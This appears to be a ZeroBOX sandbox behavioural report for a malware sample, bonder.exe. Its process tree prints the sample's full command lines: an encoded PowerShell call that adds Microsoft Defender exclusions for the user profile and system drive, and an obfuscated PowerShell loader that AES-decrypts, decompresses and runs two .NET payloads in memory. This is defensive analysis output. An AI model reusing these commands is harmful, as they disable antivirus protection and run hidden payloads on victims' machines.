popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • bonder.exe "C:\Users\test22\AppData\Local\Temp\bonder.exe"

    2552

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAaQBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AegBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAdgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZwB2ACMAPgA="

      2724

    • cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\man.bat" "

      2876

      • man.bat.exe "C:\Users\test22\AppData\Local\Temp\man.bat.exe" $OBOu='SplNbqLitNbqL'.Replace('NbqL', '');$aqEU='ReNbqLadLNbqLinNbqLeNbqLsNbqL'.Replace('NbqL', '');$wFvO='FiNbqLrstNbqL'.Replace('NbqL', '');$uTAD='CNbqLreNbqLatNbqLeNbqLDecrNbqLypNbqLtoNbqLrNbqL'.Replace('NbqL', '');$SyvP='InNbqLvNbqLokNbqLeNbqL'.Replace('NbqL', '');$wpRJ='EntNbqLryPoNbqLinNbqLtNbqL'.Replace('NbqL', '');$leFV='TrNbqLaNbqLnsNbqLfoNbqLrmNbqLFinaNbqLlBloNbqLckNbqL'.Replace('NbqL', '');$KiSR='MaNbqLiNbqLnMoNbqLdulNbqLeNbqL'.Replace('NbqL', '');$jrfh='ChanNbqLgeENbqLxteNbqLnsiNbqLoNbqLnNbqL'.Replace('NbqL', '');$LVNY='LoaNbqLdNbqL'.Replace('NbqL', '');$ZsxI='FNbqLromNbqLBasNbqLe64SNbqLtrNbqLingNbqL'.Replace('NbqL', '');$nhRS='GetNbqLCuNbqLrNbqLrNbqLenNbqLtProNbqLcNbqLesNbqLsNbqL'.Replace('NbqL', '');function jtNeP($BFDih){$ZgaCl=[System.Security.Cryptography.Aes]::Create();$ZgaCl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ZgaCl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ZgaCl.Key=[System.Convert]::$ZsxI('txkNVDrhm27W1DaL5GLcM6FMILoKtFqLKX3laNnOjxc=');$ZgaCl.IV=[System.Convert]::$ZsxI('hP/b1mKCdVvyfRQZ/p25ZA==');$AdWGs=$ZgaCl.$uTAD();$EqYkj=$AdWGs.$leFV($BFDih,0,$BFDih.Length);$AdWGs.Dispose();$ZgaCl.Dispose();$EqYkj;}function QcgQb($BFDih){$Hnmle=New-Object System.IO.MemoryStream(,$BFDih);$xRoFm=New-Object System.IO.MemoryStream;$pEUyF=New-Object System.IO.Compression.GZipStream($Hnmle,[IO.Compression.CompressionMode]::Decompress);$pEUyF.CopyTo($xRoFm);$pEUyF.Dispose();$Hnmle.Dispose();$xRoFm.Dispose();$xRoFm.ToArray();}$NdNoC=[System.Linq.Enumerable]::$wFvO([System.IO.File]::$aqEU([System.IO.Path]::$jrfh([System.Diagnostics.Process]::$nhRS().$KiSR.FileName, $null)));$UfGsn=$NdNoC.Substring(3).$OBOu(':');$WZNSc=QcgQb (jtNeP ([Convert]::$ZsxI($UfGsn[0])));$hKWvJ=QcgQb (jtNeP ([Convert]::$ZsxI($UfGsn[1])));[System.Reflection.Assembly]::$LVNY([byte[]]$hKWvJ).$wpRJ.$SyvP($null,$null);[System.Reflection.Assembly]::$LVNY([byte[]]$WZNSc).$wpRJ.$SyvP($null,$null);

        2124

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf